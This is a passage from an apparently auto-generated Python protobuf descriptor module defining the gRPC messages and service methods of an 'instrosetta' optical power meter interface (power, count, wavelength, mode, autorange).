\x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"2\n\x13GetAutorangeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"F\n\x14GetAutorangeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"E\n\x13SetAutorangeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"F\n\x14SetAutorangeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t2\xaa\x0f\n\nPowerMeter\x12\xa1\x01\n\nInitialize\x12G.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest\x1aH.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse\"\x00\x12\x9b\x01\n\x08Shutdown\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse\"\x00\x12\x9b\x01\n\x08GetPower\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse\"\x00\x12\x9b\x01\n\x08SetPower\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse\"\x00\x12\x9b\x01\n\x08GetCount\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse\"\x00\x12\x9b\x01\n\x08SetCount\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse\"\x00\x12\xaa\x01\n\rGetWavelength\x12J.instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest\x1aK.instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse\"\x00\x12\xaa\x01\n\rSetWavelength\x12J.instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest\x1aK.instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse\"\x00\x12\x98\x01\n\x07GetMode\x12\x44.instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest\x1a\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse\"\x00\x12\x98\x01\n\x07SetMode\x12\x44.instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest\x1a\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse\"\x00\x12\xa7\x01\n\x0cGetAutorange\x12I.instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest\x1aJ.instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse\"\x00\x12\xa7\x01\n\x0cSetAutorange\x12I.instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest\x1aJ.instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse\"\x00\x62\x06proto3')
)
_INITIALIZEREQUEST_PROPERTIESENTRY = _descriptor.Descriptor(
name='PropertiesEntry',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=258,
serialized_end=307,
)
_INITIALIZEREQUEST = _descriptor.Descriptor(
name='InitializeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='properties', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.properties', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_INITIALIZEREQUEST_PROPERTIESENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=114,
serialized_end=307,
)
_INITIALIZERESPONSE = _descriptor.Descriptor(
name='InitializeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='success', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse.success', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=360,
)
_SHUTDOWNREQUEST = _descriptor.Descriptor(
name='ShutdownRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=362,
serialized_end=393,
)
_SHUTDOWNRESPONSE = _descriptor.Descriptor(
name='ShutdownResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='success', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse.success', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=395,
serialized_end=444,
)
_GETPOWERREQUEST = _descriptor.Descriptor(
name='GetPowerRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=446,
serialized_end=492,
)
_GETPOWERRESPONSE = _descriptor.Descriptor(
name='GetPowerResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=494,
serialized_end=560,
)
_SETPOWERREQUEST = _descriptor.Descriptor(
name='SetPowerRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=562,
serialized_end=627,
)
_SETPOWERRESPONSE = _descriptor.Descriptor(
name='SetPowerResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=629,
serialized_end=695,
)
_GETCOUNTREQUEST = _descriptor.Descriptor(
name='GetCountRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=697,
serialized_end=743,
)
_GETCOUNTRESPONSE = _descriptor.Descriptor(
name='GetCountResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=745,
serialized_end=811,
)
_SETCOUNTREQUEST = _descriptor.Descriptor(
name='SetCountRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=813,
serialized_end=878,
)
_SETCOUNTRESPONSE = _descriptor.Descriptor(
name='SetCountResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=880,
serialized_end=946,
)
_GETWAVELENGTHREQUEST = _descriptor.Descriptor(
name='GetWavelengthRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=948,
serialized_end=999,
)
_GETWAVELENGTHRESPONSE = _descriptor.Descriptor(
name='GetWavelengthResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1001,
serialized_end=1072,
)
_SETWAVELENGTHREQUEST = _descriptor.Descriptor(
name='SetWavelengthRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1074,
serialized_end=1144,
)
_SETWAVELENGTHRESPONSE = _descriptor.Descriptor(
name='SetWavelengthResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1146,
serialized_end=1217,
)
_GETMODEREQUEST = _descriptor.Descriptor(
name='GetModeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1219,
serialized_end=1264,
)
_GETMODERESPONSE = _descriptor.Descriptor(
name='GetModeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1266,
serialized_end=1331,
)
_SETMODEREQUEST = _descriptor.Descriptor(
name='SetModeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1333,
serialized_end=1397,
)
_SETMODERESPONSE = _descriptor.Descriptor(
name='SetModeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1399,
serialized_end=1464,
)
